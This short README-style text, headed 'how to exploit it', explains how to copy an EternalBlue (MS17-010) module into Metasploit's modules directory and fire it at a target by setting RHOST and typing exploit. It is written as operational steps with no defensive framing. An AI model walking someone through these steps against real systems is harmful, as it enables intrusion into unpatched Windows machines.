how to exploit it

You have 2 files, one for scanning and another for exploit. So copy and paste the exploit in msf dir:
cp ms17-010/exploits/eternalblue/ms17_010_eternalblue.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/
And you will be able by running msfconsole, choose ms17-010, set RHOST, and finally type exploit!
